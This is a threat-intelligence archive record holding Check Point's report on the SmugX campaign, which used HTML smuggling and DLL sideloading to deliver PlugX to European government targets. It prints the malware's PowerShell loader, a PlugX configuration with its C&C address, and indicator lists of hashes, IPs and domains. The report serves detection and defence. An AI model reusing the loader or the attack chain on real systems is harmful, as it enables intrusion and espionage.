{ "id": "44f7d4f3-511d-4a5a-bde3-d09690e5f4a2", "created_at": "2026-04-19T02:22:09.688615Z", "updated_at": "2026-04-20T02:22:10.995627Z", "deleted_at": null, "sha1_hash": "43e6900f3abe002005d5c782d1d42bb02fe50265", "title": "Chinese Threat Actors Targeting Europe in SmugX Campaign", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 102521, "plain_text": "Chinese Threat Actors Targeting Europe in SmugX Campaign\r\nBy etal\r\nPublished: 2023-07-03 · Archived: 2026-04-19 02:00:25 UTC\r\nIntroduction\r\nIn the last couple of months, Check Point Research (CPR) has been tracking the activity of a Chinese threat actor\r\ntargeting Foreign Affairs ministries and embassies in Europe. Combined with other Chinese activity previously\r\nreported by Check Point Research, this represents a larger trend within the Chinese ecosystem, pointing to a shift\r\nto targeting European entities, with a focus on their foreign policy.\r\nThe activity described in this report, utilizes HTML Smuggling to target governmental entities in Eastern Europe.\r\nThis specific campaign has been active since at least December 2022, and is likely a direct continuation of a\r\npreviously reported campaign attributed to RedDelta (and also to Mustang Panda, to some extent).\r\nThe campaign uses new delivery methods to deploy (most notably – HTML Smuggling) a new variant of PlugX,\r\nan implant commonly associated with a wide variety of Chinese threat actors. Although the payload itself remains\r\nsimilar to the one found in older PlugX variants, its delivery methods results in low detection rates, which until\r\nrecently helped the campaign fly under the radar.\r\nKey findings:\r\nCheck Point Research uncovers a targeted campaign carried out by a Chinese threat actor targeting\r\ngovernment entities in Europe, with a focus on foreign and domestic policy entities.\r\nThe campaign leverages HTML Smuggling, a technique in which attackers hide malicious payloads inside\r\nHTML documents.\r\nFollowing a complex infection chain involving either archives or MSI files, the attacks deploy PlugX, an\r\nimplant commonly associated with Chinese threat actors.\r\nThe campaign, called SmugX, overlaps with previously reported activity by Chinese APT\r\nactors RedDelta and Mustang Panda. Although those two correlate to some extent with Camaro Dragon,\r\nthere is insufficient evidence to link the SmugX campaign to the Camaro Dragon group.\r\nHTML Smuggling 101\r\nLet’s start with a short overview of HTML Smuggling, a well-documented technique associated with cyber\r\ncriminals and state-sponsored actors alike. Malicious files are embedded within HTML documents, enabling them\r\nto evade network-based detection measures.\r\nThe way HTML Smuggling is utilized in the SmugX campaign results in the download of either a JavaScript or a\r\nZIP file. Opening those malicious HTML documents results in the following chain of events:\r\nhttps://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/\r\nPage 1 of 10\n\n1. The embedded payload within the code is decoded and saved to a JavaScript blob, specifying the\r\nappropriate file type such as  application/zip .\r\n2. Instead of utilizing the HTML  \u003ca\u003e  element, the JavaScript code dynamically creates it.\r\n3. A URL object is created from the blob using the  createObjectURL  function.\r\n4. The  download  attribute is set with the desired filename.\r\n5. Finally, the code invokes the click action, which simulates a user clicking on the link, and initiates the file\r\ndownload.\r\n6. For older browser versions, the code employs  msSaveOrOpenBlob  to save the blob with the desired\r\nfilename.\r\nFigure 1 - The obfuscated HTML Smuggling implementation.\r\nFigure 1 – The obfuscated HTML Smuggling implementation.\r\nLures \u0026 Targets\r\nThe lure themes are heavily focused on European domestic and foreign policies and were used to target mostly\r\ngovernmental ministries in Eastern Europe.\r\nFigure 2 - SmugX campaign targets and lures.\r\nFigure 2 – SmugX campaign targets and lures.\r\nThe majority of the documents contained diplomatic-related content. In more than one case, the content was\r\ndirectly related to China.\r\nThe lures uploaded to VirusTotal include:\r\nA letter originating from the Serbian embassy in Budapest.\r\nA document stating the priorities of the Swedish Presidency of the Council of the European Union.\r\nAn invitation to a diplomatic conference issued by Hungary’s Ministry of Foreign Affairs.\r\nAn article about two Chinese human rights lawyers sentenced to more than a decade in prison.\r\nIn addition, the names of the archived files themselves strongly suggest that the intended victims were diplomats\r\nand government entities. Here are a few examples of the names we identified:\r\nDraft Prague Process Action Plan_SOM_EN\r\n2262_3_PrepCom_Proposal_next_meeting_26_April\r\nComments FRANCE – EU-CELAC Summit – May 4\r\n202305 Indicative Planning RELEX\r\nChina jails two human rights lawyers for subversion\r\nFigure 3 - Some of the lures used in this campaign.\r\nFigure 3 – Some of the lures used in this campaign.\r\nReconnaissance\r\nhttps://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/\r\nPage 2 of 10\n\nDuring our research, we came across a document named China Tries to Block Prominent Uyghur Speaker at\nUN.docx , which was uploaded to VirusTotal. This document employs remote image technique to access the\nURL https://www.jcswcd[.]com/?wd=cqyahznz , containing a single pixel image which is not apparent to the\nuser. This technique, called pixel tracking, is commonly used as a reconnaissance tool. As the remote image is\nrequested, the attackers’ server logs the request, capturing information such as the IP address, user agent, and\nsometimes the time of access. By analyzing the collected data, the attackers can gather information about the\nrecipient’s behavior, such as when and where the document was accessed.\nFigure 4 - Reconnaissance file.\n\nInfection chains\nFigure 4 – Reconnaissance file.\nInfection Chains\nFigure 5 - Overview of the PlugX infection chains.\nFigure 5 – Overview of the PlugX infection chains.\nThere are two main infection chains, both of which originate from an HTML file that saves the second stage to the\nDownload folder according to the victim’s browser settings. The second stage can vary, with one chain using a ZIP\nfile that contains a malicious LNK file, and the other chain utilizes JavaScript to download an MSI file from a\nremote server.\nSmugX Archive Chain\nIn the first scenario, the HTML smuggles a ZIP archive that contains a malicious LNK file that runs PowerShell.\nThe PowerShell extracts a compressed archive embedded within the lnk file and saves it to the %temp% directory.\nThe archive, named tmp.zip or tmp.zip , contains three files:\n1. A legitimate executable used to sideload the payload\n(either robotaskbaricon.exe or passwordgenerator.exe ).\n2. The malicious sideloaded DLL RoboForm.dll .\n3. The PlugX payload data.dat .\nⓘ The vulnerability in RoboForm was addressed by the company starting Version 9.3.7 for Windows,\nwhich was released on November 1, 2022.\nThe PowerShell then continues to run the hijacked software, triggering the execution of the PlugX payload stored\nin data.dat .\nPlain text\nCopy to clipboard\nOpen code in new window\nEnlighterJS 3 Syntax Highlighter\n$obf_lnkpath = Get - ChildItem * .lnk | where - object {$_.length - eq 00824235}\nhttps://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/\nPage 3 of 10\n\n| Select - Object - ExpandProperty FullName;\r\n$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);\r\n$obf_path = 'C:\\Users\\User\\AppData\\Local\\Temp\\tmp.zip';\r\n$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);\r\n$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);\r\n[System.IO.File]::WriteAllBytes($obf_path, $obf_file[008192..($obf_file.length)]);\r\ncd $obf_dir;\r\nExpand - Archive - Path $obf_path - DestinationPath . - EA SilentlyContinue - Force | Out - Null;\r\nRemove - Item - Path $obf_path - EA SilentlyContinue - Force | Out - Null;\r\n\u0026 .\\passwordgenerator.exe\r\n$obf_lnkpath = Get - ChildItem * .lnk | where - object {$_.length - eq 00824235} | Select - Object -\r\nExpandProperty FullName; $obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath); $obf_path =\r\n'C:\\Users\\User\\AppData\\Local\\Temp\\tmp.zip'; $obf_path =\r\n[Environment]::ExpandEnvironmentVariables($obf_path); $obf_dir =\r\n[System.IO.Path]::GetDirectoryName($obf_path); [System.IO.File]::WriteAllBytes($obf_path, $obf_file[008192..\r\n($obf_file.length)]); cd $obf_dir; Expand - Archive - Path $obf_path - DestinationPath . - EA SilentlyContinue -\r\nForce | Out - Null; Remove - Item - Path $obf_path - EA SilentlyContinue - Force | Out - Null; \u0026\r\n.\\passwordgenerator.exe\r\n$obf_lnkpath = Get - ChildItem * .lnk | where - object {$_.length - eq 00824235}\r\n| Select - Object - ExpandProperty FullName;\r\n$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);\r\n$obf_path = 'C:\\Users\\User\\AppData\\Local\\Temp\\tmp.zip';\r\n$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);\r\n$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);\r\n[System.IO.File]::WriteAllBytes($obf_path, $obf_file[008192..($obf_file.length)]);\r\ncd $obf_dir;\r\nExpand - Archive - Path $obf_path - DestinationPath . - EA SilentlyContinue - Force | Out - Null\r\nRemove - Item - Path $obf_path - EA SilentlyContinue - Force | Out - Null;\r\n\u0026 .\\passwordgenerator.exe\r\nSmugX JavaScript Chain\r\nThe second scenario utilizes HTML Smuggling to download a JavaScript file. When this file is executed, it\r\ndownloads and executes an MSI file from the attackers’ server. The MSI creates a new folder within\r\nthe  %appdata%\\Local  directory, in which the three files extracted from the MSI package are stored. The dropped\r\nfiles consist of a hijacked legitimate executable, the loader DLL, and the encrypted payload, as described above.\r\nhttps://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/\r\nPage 4 of 10\n\nLoader\r\nAs observed in past instances, PlugX malware employs DLL sideloading techniques. After the lnk or MSI file\r\ndrops the necessary files, it triggers the execution of a legitimate program, which in turn loads the malicious DLL.\r\nThe DLL is responsible for decrypting the final payload, which is often stored in a file named  data.dat  using\r\nRC4 encryption.\r\nThe decryption process utilizes a hardcoded key that varies across different versions of the malware. Once\r\ndecrypted, the payload is loaded into memory for further execution.\r\nFigure 6 - The loader Loads and decrypts the payload in memory using the highlighted key.\r\nFigure 6 – The loader Loads and decrypts the payload in memory using the highlighted key.\r\nPlugX Malware\r\nThe final payload is PlugX malware, which has been utilized by multiple Chinese threat actors since 2008. It\r\noperates as a remote access tool (RAT) and employs a modular structure which enables it to accommodate diverse\r\nplugins with distinct functionalities. This enables the attackers to carry out a range of malicious activities on\r\ncompromised systems, including file theft, screen captures, keystroke logging, and command execution.\r\nTo ensure persistence, the PlugX payload copies the legitimate program and the DLL and stores them within a\r\nhidden directory it creates. The encrypted payload is stored in a separate hidden folder. The malware achieves\r\npersistence by adding the legitimate program to the  Run  registry key.\r\nFigure 7 - RoboForm Update key added for persistence.\r\nFigure 7 – RoboForm Update key added for persistence.\r\nSome of the PlugX payloads we found write a deceptive lure in the form of a PDF file to the  %temp%  directory\r\nand then open it. The document path is stored within the PlugX configuration under  document_name . It is worth\r\nmentioning that only a few samples within this campaign included the  document_name  field; it was missing in the\r\nmajority of the samples.\r\nFollowing the initial execution which sets the persistence and copies the malware files to its target directories, the\r\nmalware executes itself once again. This time it includes a parameter indicating that it should exclusively carry out\r\ncommunication with the C\u0026C (Command and Control) server. One notable change we saw in this campaign’s\r\nsamples is the increasing use of the RC4 encryption method compared to the simple XOR decryption we have\r\nseen in the past. The encrypted config still resides in the data section, but it has the key prepended at the start of\r\nthe config and not in the decryption function like in previous samples.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nhttps://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/\r\nPage 5 of 10\n\n{\r\n\"str_one\": \"\",\r\n\"str_two\": \"TwGd6YGGI\",\r\n\"campaign_id\": \"test3\",\r\n\"document_name\": \"202305 Indicative Planning RELEX.pdf\",\r\n\"ips\": [\r\n{\r\n\"ip\": \"62.233.57.136\",\r\n\"port\": 443,\r\n\"is_https\": 1\r\n},\r\n{\r\n\"ip\": \"62.233.57.136\",\r\n\"port\": 443,\r\n\"is_https\": 1\r\n},\r\n{\r\n\"ip\": \"62.233.57.136\",\r\n\"port\": 443,\r\n\"is_https\": 1\r\n}\r\n]\r\n}\r\n{ \"str_one\": \"\", \"str_two\": \"TwGd6YGGI\", \"campaign_id\": \"test3\", \"document_name\": \"202305 Indicative\r\nPlanning RELEX.pdf\", \"ips\": [ { \"ip\": \"62.233.57.136\", \"port\": 443, \"is_https\": 1 }, { \"ip\": \"62.233.57.136\",\r\n\"port\": 443, \"is_https\": 1 }, { \"ip\": \"62.233.57.136\", \"port\": 443, \"is_https\": 1 } ] }\r\nhttps://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/\r\nPage 6 of 10\n\n{\r\n \"str_one\": \"\",\r\n \"str_two\": \"TwGd6YGGI\",\r\n \"campaign_id\": \"test3\",\r\n \"document_name\": \"202305 Indicative Planning RELEX.pdf\",\r\n \"ips\": [\r\n {\r\n \"ip\": \"62.233.57.136\",\r\n \"port\": 443,\r\n \"is_https\": 1\r\n },\r\n {\r\n \"ip\": \"62.233.57.136\",\r\n \"port\": 443,\r\n \"is_https\": 1\r\n },\r\n {\r\n \"ip\": \"62.233.57.136\",\r\n \"port\": 443,\r\n \"is_https\": 1\r\n }\r\n ]\r\n}\r\nDuring the course of our investigating the samples, the threat actor dispatched a batch script, sent from the C\u0026C\r\nserver, intended to erase any trace of their activities. This script, named  del_RoboTask Update.bat , eradicates the\r\nlegitimate executable, the PlugX loader DLL, and the registry key implemented for persistence, and ultimately\r\ndeletes itself. It is likely this is the result of the threat actors becoming aware they were under scrutiny.\r\nAttribution\r\nThis campaign shares significant similarities with activity attributed by other security vendors to either RedDelta\r\nor Mustang Panda (In this context it is worth noting that RedDelta and Mustang Panda are correlated to some\r\nextent, and in some cases are used to describe same activity):\r\nInfrastructure – During our research, we found a distinctive certificate on the C\u0026C server with the IP\r\naddress  62.233.57[.]136 . Notably, the common name within this certificate points to another IP\r\naddress,  45.134.83[.]29 , an indictor previously associated with RedDelta.\r\nIt is worth mentioning that the same certificate was referenced in other research about Mustang Panda,\r\nfurther solidifying the link between SmugX and previously observed activities.\r\nFigure 8 - The certificate found on the C\u0026C server.\r\nFigure 8 – The certificate found on the C\u0026C server.\r\nhttps://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/\r\nPage 7 of 10\n\nPaths – Some of the paths used to deploy PlugX are unique and were observed in the campaigns described\r\nabove. The unique paths we observed include:\r\nC:\\Users\\Public\\VirtualFile\r\nC:\\Users\\Public\\SamsungDriver\r\nC:\\Users\\Public\\SecurityScan\r\nTargeting – In addition to technical evidence, the victimology and lure tactics employed in the SmugX\r\ncampaign are highly correlated to those described in RedDelta and Mustang Panda reports by other\r\nvendors.\r\nWe recently published a set of articles about a threat actor we’ve been tracking named Camaro Dragon, whose\r\nactivity overlaps with Mustang Panda and RedDelta. However, there is insufficient evidence to link this current\r\ncampaign directly to Camaro Dragon and are therefore tracking it as the SmugX campaign.\r\nConclusion\r\nIn this report, we analyzed a recent campaign which correlates to RedDelta activities, and overlaps to some degree\r\nwith Mustang Panda, highlighting their persistent targeting of European government entities. We identified\r\nmultiple infection chains that employ the HTML Smuggling technique which leads to the deployment of the\r\nPlugX payload. The campaign, called SmugX, is part of a larger trend we’re seeing of Chinese threat actors\r\nshifting their focus to Europe.\r\nWhile none of the techniques observed in this campaign is new or unique, the combination of the different tactics,\r\nand the variety of infection chains resulting in low detection rates, enabled the threat actors to stay under the radar\r\nfor quite a while. As for PlugX, it also remained largely unchanged from previous appearances, although one new\r\naspect observed is the adoption of RC4 encryption of the payload, which is a departure from the previously\r\nutilized XOR encryption.\r\nCheck Point Software Customers remain protected against the threat described in\r\nthis research.\r\nCheck Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics, file-types, and operating systems and is protecting against the type of attacks and threats described in this report.\r\nCheck Point Threat Emulation:\r\nAPT.Wins.MustangPanda.AP\r\nHarmony Endpoint:\r\nAPT.Win.PlugX.O\r\nAPT.Win.PlugX.Q\r\nAPT.Win.PlugX.R\r\nIOCs\r\nhttps://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/\r\nPage 8 of 10\n\nHashes\r\nHTML\r\nedb5d4b454b6c7d3abecd6de7099e05575b8f28bb09dfc364e45ce8c16a34fcd\r\n736451c2593bc1601c52b45c16ad8fd1aec56f868eb3bba333183723dea805af\r\n0e4b81e04ca77762be2afb8bd451abb2ff46d2831028cde1c5d0ec45199f01a1\r\n989ede1df02e4d9620f6caf75a88a11791d156f62fdea4258e12d972df76bc05\r\n10cad59ea2a566597d933b1e8ba929af0b4c7af85481eacaab708ef4ddf6e0ee\r\nc96723a68fc939c835578ff746f7d4c5371cb82a9c0dffe360bb656acea4d6e1\r\n9ce5abd02d397689d99f62dfbd2a6a396876c6629cb5db453f1dcbbc3465ac9a\r\nArchives\r\n5f751fb287db51f79bb6df2e330a53b6d80ef3d2af93f09bb786b62e613514db\r\nbaca1159acc715545a787d522950117eae5b7dc65efacfe86383f62e6b9b59d3\r\n720a70ca6ee1fbaf06c7cb60d14e27391130407e34e13a092d19f1df2c9c6d05\r\n460c459db77c5625ed1c029b2dd6c6eae5e631b81a169494fb0182d550769f76\r\n277390cc50e00f52e76a6562e6e699b0345497bd1df26c7c41bd56da5b6d1347\r\nJavaScripts\r\n3c6ace055527877778d989f469a5a70eb5ef7700375b850f0b1b8414151105ee\r\n27a61653ce4e503334413cf80809647ce5dca02ff4aea63fb3a39bc62c9c258c\r\nce308b538ff3a0be0dbcee753db7e556a54b4aeddbddd0c03db7126b08911fe2\r\nMSI\r\nfd0711a50c8af1dbc5c7ba42b894b2af8a2b03dd7544d20f5a887c93b9834429\r\n3489955d23e66d6f34b3ada70b4d228547dbb3ccb0f6c7282553cbbdeaf168cb\r\n04b99518502774deb4a9d9cf6b54d43ff8f333d8ec5b4b230c0e995542bb2c61\r\nbd3881964e351a7691bfc7e997e8a2c8ce4a8e26b79e3712d0cbdc484a5646b6\r\nea2869424df2ffbb113017d95ae48ae8ed9897280fd21b26e046c75b3e43b25a\r\nRoboForm.dll\r\nb00c252a60171f33e32e64891ffe826b8a45f8816acf778838d788897213a405\r\n2bc30ced135acd6a506cfb557734407f21b70fecd2f645c5b938e14199b24f1e\r\n0d13a503d86a6450f71408eb82a196718324465744bf6b8c4e0a780fd5be40c0\r\n0bdfb922a39103658195d1d37ff584d24f7bd88464e7a119e86d6e3579958cc1\r\na0879dd439c7f1ed520aad0c309fe1dbf1a2fc41e2468f4174489a0ec56c47c7\r\nbddbc529f23ab6b865bc750508403ef57c8cf77284d613d030949bd37078d880\r\n4547914e17c127d9b53bbc9d44de0e5b867f1a86d2e5ede828cd3188ed7fe838\r\n0032d5430f1b5fcfb6a380b4f1d226b6b919f2677340503f04df04235409b2d0\r\nEncrypted payload\r\nhttps://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/\r\nPage 9 of 10\n\n62c2e246855d589eb1ec37a9f3bcc0b6f3ba9946532aff8a39a4dc9d3a93f42c\r\nf7d35cb95256513c07c262d4b03603e073e58eb4cd5fa9aac1e04ecc6e870d42\r\nbf4f8a5f75e9e5ecd752baa73abddd37b014728722ac3d74b82bffa625bf09b5\r\n8a6ef9aa3f0762b03f983a1e53e8c731247273aafa410ed884ecd4c4e02c7db8\r\nec3e491a831b4057fc0e2ebe9f43c32f1f07959b6430b323d35d6d409d2b31e4\r\nbf8e512921522e49d16c638dc8d01bd0a2803a4ef019afbfc2f0941875019ea1\r\nba55542c6fa12865633d6d24f4a81bffd512791a6e0a9b77f6b17a53e2216659\r\nDecrypted payload\r\n8ea34b85dd4fb64f7e6591e4f1c24763fc3421caa7c0f0d8350c67b9bafa4d32\r\n8cac6dfb2a894ff3f530c29e79dcd37810b4628279b9570a34f7e22bd4d416b3\r\nea5825fa1f39587a88882e87064caae9dd3b79f02438dc3a229c5b775b530c7d\r\n1acb061ce63ee8ee172fbdf518bd261ef2c46d818ffd4b1614db6ce3daa5a885\r\n08661f40f40371fc8a49380ad3d57521f9d0c2aa322ae4b0a684b27e637aed12\r\n324bfb2f414be221e24aaa9fb22cb49e4d4c0904bd7c203afdff158ba63fe35b\r\nIPs \u0026 domains\r\n45.90.58[.]69\r\n62.233.57[.]136\r\n217.12.207[.]164\r\n152.152.12[.]12\r\njcswcd[.]com\r\nnewsmailnet[.]com\r\nPaths\r\nC:\\Users\\\u003cusername\u003e\\VirtualFile\r\nC:\\Users\\Public\\VirtualFile\r\nC:\\Users\\\u003cusername\u003e\\SamsungDriver\r\nC:\\Users\\Public\\SamsungDriver\r\nC:\\Users\\Public\\SecurityScan\r\nSource: https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/\r\nhttps://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/\r\nPage 10 of 10\n\n] } \n{ \"str_one\": \"\", \"str_two\": \"TwGd6YGGI\", \"campaign_id\": \"test3\", \"document_name\": \"202305 Indicative\nPlanning RELEX.pdf\", \"ips\": [ { \"ip\": \"62.233.57.136\", \"port\": 443, \"is_https\": 1 }, { \"ip\": \"62.233.57.136\",\n\"port\": 443, \"is_https\": 1 }, { \"ip\": \"62.233.57.136\", \"port\": 443, \"is_https\": 1 } ] }\n Page 6 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY" ], "origins": [ "web" ], "references": [ "https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/" ], "report_names": [ "chinese-threat-actors-targeting-europe-in-smugx-campaign" ], "threat_actors": [ { "id": "2ff375ef-7859-4d44-9399-06c9d1d9359c", "created_at": "2023-07-11T02:00:10.063244Z", "updated_at": "2026-04-20T02:00:03.558402Z", "deleted_at": null, "main_name": "SmugX", "aliases": [], "source_name": "MISPGALAXY:SmugX", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "aa90ad17-8852-4732-9dba-72ffb64db493", "created_at": "2023-07-11T02:00:10.067957Z", "updated_at": "2026-04-20T02:00:03.55918Z", "deleted_at": null, "main_name": "RedDelta", "aliases": [], "source_name": "MISPGALAXY:RedDelta", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b69037ec-2605-4de4-bb32-a20d780a8406", "created_at": "2023-01-06T13:46:38.790766Z", "updated_at": "2026-04-20T02:00:03.31873Z", "deleted_at": null, "main_name": "MUSTANG PANDA", "aliases": [ "BRONZE PRESIDENT", "Red Lich", "Earth Preta", "Polaris", "TANTALUM", "Twill Typhoon", "HoneyMyte", "TEMP.HEX", "TA416", "Stately Taurus", "LuminousMoth" ], "source_name": "MISPGALAXY:MUSTANG PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6daadf00-952c-408a-89be-aa490d891743", "created_at": "2025-08-07T02:03:24.654882Z", "updated_at": "2026-04-20T02:00:04.3921Z", "deleted_at": null, "main_name": "BRONZE PRESIDENT", "aliases": [ "Aoqin Dragon ", "Earth Preta ", "HoneyMyte ", "Mustang Panda ", "Red Delta ", "Red Lich ", "Stately Taurus ", "TA416 ", "Temp.Hex ", "Twill Typhoon " ], "source_name": "Secureworks:BRONZE PRESIDENT", "tools": [ "BlueShell", "China Chopper", "Claimloader", "Cobalt Strike", "HIUPAN", "ORat", "PTSOCKET", "PUBLOAD", "PlugX", "RCSession", "TONESHELL", "TinyNote" ], "source_id": "Secureworks", "reports": null }, { "id": "fad89cb7-83e8-4d8c-8cf8-dce2c6e54479", "created_at": "2023-10-27T02:00:07.764261Z", "updated_at": "2026-04-20T02:00:03.566662Z", "deleted_at": null, "main_name": "Camaro Dragon", "aliases": [], "source_name": "MISPGALAXY:Camaro Dragon", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b5449533-0ff1-4048-999d-7d4bfd8e6da6", "created_at": "2022-10-25T16:07:24.114365Z", "updated_at": "2026-04-20T02:00:05.782689Z", "deleted_at": null, "main_name": "RedDelta", "aliases": [ "Operation Dianxun", "TA416" ], "source_name": "ETDA:RedDelta", "tools": [ "Agent.dhwf", "Agentemis", "Chymine", "Cobalt Strike", "CobaltStrike", "Darkmoon", "Destroy RAT", "DestroyRAT", "Gen:Trojan.Heur.PT", "Kaba", "Korplug", "PlugX", "Poison Ivy", "RedDelta", "SPIVY", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Xamtrav", "cobeacon", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "9baa7519-772a-4862-b412-6f0463691b89", "created_at": "2022-10-25T15:50:23.354429Z", "updated_at": "2026-04-20T02:00:04.192878Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Mustang Panda", "TA416", "RedDelta", "BRONZE PRESIDENT", "STATELY TAURUS", "FIREANT", "CAMARO DRAGON", "EARTH PRETA", "HIVE0154", "TWILL TYPHOON", "TANTALUM", "LUMINOUS MOTH", "UNC6384", "TEMP.Hex", "Red Lich" ], "source_name": "MITRE:Mustang Panda", "tools": [ "CANONSTAGER", "STATICPLUGIN", "ShadowPad", "TONESHELL", "Cobalt Strike", "HIUPAN", "Impacket", "SplatCloak", "PAKLOG", "Wevtutil", "AdFind", "CLAIMLOADER", "Mimikatz", "PUBLOAD", "StarProxy", "CorKLOG", "RCSession", "NBTscan", "PoisonIvy", "SplatDropper", "China Chopper", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-20T02:00:05.698663Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1776565329, "ts_updated_at": 1776651730, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/43e6900f3abe002005d5c782d1d42bb02fe50265.pdf", "text": "https://archive.orkl.eu/43e6900f3abe002005d5c782d1d42bb02fe50265.txt", "img": "https://archive.orkl.eu/43e6900f3abe002005d5c782d1d42bb02fe50265.jpg" } }